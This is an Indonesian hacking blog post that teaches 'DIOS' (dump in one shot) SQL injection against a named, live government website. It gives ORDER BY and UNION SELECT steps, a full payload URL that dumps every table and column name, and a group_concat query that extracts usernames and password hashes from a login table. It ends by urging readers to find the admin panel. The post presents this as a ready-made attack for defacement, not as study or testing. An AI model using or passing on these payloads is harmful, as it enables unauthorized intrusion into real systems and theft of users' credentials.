SukabumiBlackHat

Tutorial Deface,Hacking,and All about IT

Sqli DIOS (DUMP IN ONE SHOT)

Unknown 7:41 PM , No comments

Hallo whats up gais dah lama gx bikin tutor gue wkwokowk males anjir :v  karena ada mood gtau apa hari ini gua mau bikin tutorial lumyan menarik makanya gua bikin yooo simak gais 

tutor nya yaitu dios (DUMP IN ONE SHOT) tutor ini mungkin berguna bagi  para injektor :v
soalnya ni tutor kalo yang suka maenan sqli gak perlu muter muter manual jadi tinggal shoot aee

bahan :
-koneksi internet
-dork vuln sqli
 kalo  target sqli udah pada tau kan ciri ciri web yang vuln terhadap injeksi ? 
kalo gx tau simak dulu di sini 

kalian harus cari web vuln dan cari angka ajaib nya :v 
gua kasih live target ae dah :v http://jdih.bengkaliskab.go.id/baca-berita.html?id-berita=18
nah itu live target nya :'v
yang harus di lakukan ialan mencari jumlah kolom di web tersebut 
cara nya yaitu dengan order+by+  setelah di ketahui ternyata web tersebut error di number 9 
 nah sekarang yang kalian perlukan ialah mencari angka ajaib untuk melakukan DIOS tadi kita gunakan perintah union+select+ 

Nah bisa kalian lihat kan ternyata angka ajaib nya adalah 2 sekarang adalah langkah untuk melakukan DIOS nya caranya ? simak gan
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)

nah itu adalah query untuk melakukan dios caranya gampang sangat kalian hanya perlu menambahkan query tersebut ke angka ajaib yang muncul jadi kek gini

http://jdih.bengkaliskab.go.id/baca-berita.html?id-berita=-18%27+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),3,4,5,6,7,8,9+--+

Nah kek di atas kalian ngerti kan nanti akan muncul kaya gambar di bawah

kayak gitu sekarang kita tinggal melakukan perintah  group_concat

yang di kiri adalah column di kanan table
#CMIIW

jadi gini :

http://jdih.bengkaliskab.go.id/baca-berita.html?id-berita=-18%27+union+select+1,group_concat(user,0x3a,pas_enc),3,4,5,6,7,8,9+from+tbl_login+--+



Nah muncul user sama pass nya wkwkw tinggal cari admin login nya beibeh :v





No comments :

Post a Comment

Subscribe to: Post Comments ( Atom )

Recent Posts

Contact Form

Name

Email *

Message *